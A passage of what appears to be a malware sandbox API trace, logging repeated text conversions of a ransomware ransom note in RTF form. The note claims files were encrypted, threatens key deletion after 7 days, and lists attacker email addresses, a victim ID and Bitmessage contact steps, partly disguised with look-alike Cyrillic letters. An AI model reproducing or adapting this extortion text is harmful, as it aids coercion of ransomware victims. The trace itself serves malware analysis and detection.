demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. 